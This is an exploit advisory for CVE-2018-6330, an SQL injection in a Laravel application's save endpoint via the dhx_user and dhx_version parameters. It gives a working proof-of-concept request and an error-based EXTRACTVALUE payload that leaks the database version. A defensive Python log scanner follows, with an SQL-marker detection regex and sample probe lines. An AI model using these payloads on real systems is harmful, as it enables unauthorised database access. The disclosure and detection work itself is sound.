# Exploit Title: Laravel SQL injection 5.4.15

# Date: 26.01.2018

# Software Link: https://laravel.com/

# Exploit Author: Gianluca Bonanno

# Contact: Gianluca.bonanno@i-sec.tuv.com

# CVE: CVE-2018-6330

# Category: Webapps

# Version : 5.4.15

# Tested on : Apache 2.4.29

  1. Description

Any registered user can exploit the SQL injection because the input is not sanitized inside save.php. The affected parameters are dhx_user and dhx_version.

  2. Proof of Concept

Log in as a user, then send the following request:

GET /save?dhx_user=1516954053138'&dhx_version=1&swt_subdomain=center01 HTTP/1.1
Host: xxxxxx.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://xxxxxxx.net/agenda
X-Requested-With: XMLHttpRequest

In the response you will see:

You have an Error in your Mysql Syntax.

To get the database version displayed, send the following payload:

dhx_user=1516954053138%27%29%20AND%20EXTRACTVALUE%282263%2CCONCAT%280x5c%2C0x7171766b71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C21%29%29%2C0x7176787171%29%29--%20WWGj

The response will look like this:

[…]
<span class="exception_message">PDO - sql execution failed<br />
XPATH syntax error: '\qqvkq5.7.18-1qvxqq'</span>
[…]
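Added example (not part of the advisory or of the affected project): a Python check that flags /save requests whose dhx_user or dhx_version values are not plain integers or carry SQL syntax, run over constructed Apache access-log lines modelled on the request above. The log format, the client IP, the Referer host and the shortened probe in the third line are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The advisory names dhx_user and dhx_version as the injectable parameters. In legitimate
# dhtmlx traffic both are plain integers (a millisecond timestamp and a counter), so a
# value that is not all digits is the simplest allow-list check; the SQL markers below
# additionally catch the error-based probing the advisory describes.
NUMERIC_PARAMS = ("dhx_user", "dhx_version")
SQL_MARKERS = re.compile(r"extractvalue|updatexml|concat\(|union\s+select|--\s|'|\)", re.I)

# Apache combined log format (the advisory's test platform); only the fields we need are named.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def check_query(query):
    """Return a list of findings for one /save query string; an empty list means clean."""
    findings = []
    params = parse_qs(query, keep_blank_values=True)  # parse_qs URL-decodes each value
    for name in NUMERIC_PARAMS:
        for value in params.get(name, []):
            if not value.isdigit():
                findings.append("%s is not numeric: %r" % (name, value))
            if SQL_MARKERS.search(value):
                findings.append("%s contains SQL syntax: %r" % (name, value))
    return findings


def scan_access_log(lines):
    """Return (client ip, status, findings) for every /save request whose parameters look injected."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m.group("path"))
        if url.path != "/save":
            continue  # only the endpoint named in the advisory is of interest
        findings = check_query(url.query)
        if findings:
            hits.append((m.group("ip"), m.group("status"), findings))
    return hits


# Constructed sample log: a normal save, the single-quote probe, and a shortened EXTRACTVALUE probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Jan/2018:10:00:01 +0100] "GET /save?dhx_user=1516954053138&dhx_version=1&swt_subdomain=center01 HTTP/1.1" 200 512 "https://example.net/agenda" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Jan/2018:10:00:07 +0100] "GET /save?dhx_user=1516954053138%27&dhx_version=1&swt_subdomain=center01 HTTP/1.1" 500 1337 "https://example.net/agenda" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Jan/2018:10:00:15 +0100] "GET /save?dhx_user=1516954053138%27%29%20AND%20EXTRACTVALUE%281%2CVERSION%28%29%29--%20x&dhx_version=1 HTTP/1.1" 500 1400 "https://example.net/agenda" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, findings in scan_access_log(SAMPLE_LOG):
        print(ip, status, "; ".join(findings))
```

The same check_query() allow-list is what the application side should enforce before the values reach PDO, alongside bound parameters.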